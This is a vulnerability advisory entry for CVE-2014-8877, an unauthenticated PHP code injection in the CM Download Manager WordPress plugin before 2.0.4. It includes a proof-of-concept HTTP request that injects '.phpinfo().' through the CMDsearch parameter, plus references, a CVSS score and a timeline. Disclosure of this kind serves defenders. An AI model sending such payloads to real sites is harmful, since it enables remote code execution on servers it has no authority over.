CM Download Manager < 2.0.4 – Unauthenticated Code Injection | CVE 2014-8877 | Plugin Vulnerabilities

Description

The plugin does not validate and sanitise the CMDsearch parameter which used to create a custom function. This allows attacker to run arbitrary command on the remote server

Proof of Concept

GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Affects Plugins

cm-download-manager

Fixed in 2.0.4

References

CVE

Exploitdb

URL

https://packetstormsecurity.com/files/#129183/

URL

https://downloadsmanager.cminds.com/release-notes/

Classification

Type

RCE

OWASP top 10

CWE

CVSS

10.0 (critical)

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter

Verified

No

WPVDB ID

7f4182ab-93bf-4766-b27c-9bd6217d2a20

Timeline

Publicly Published

2014-11-20 (about 11 years ago)

Added

2014-11-20 (about 11 years ago)

Last Updated

2020-10-22 (about 5 years ago)

Other

Published

Title

Published

2025-04-21

Title

Ocean Extra < 2.4.7 - Unauthenticated Arbitrary Shortcode Execution

Published

2025-04-25

Title

Add custom page template <= 2.0.1 - Authenticated (Administrator+) PHP Code Injection to Remote Code Execution

Published

2025-01-30

Title

AI Infographic Maker < 5.0.0 - Unauthenticated Arbitrary Shortcode Execution

Published

2014-10-13

Title

WP-DBManager < 2.7.2 - Authenticated Command Injection

Published

2020-04-19

Title

Media Library Assistant < 2.82 - Authenticated RCE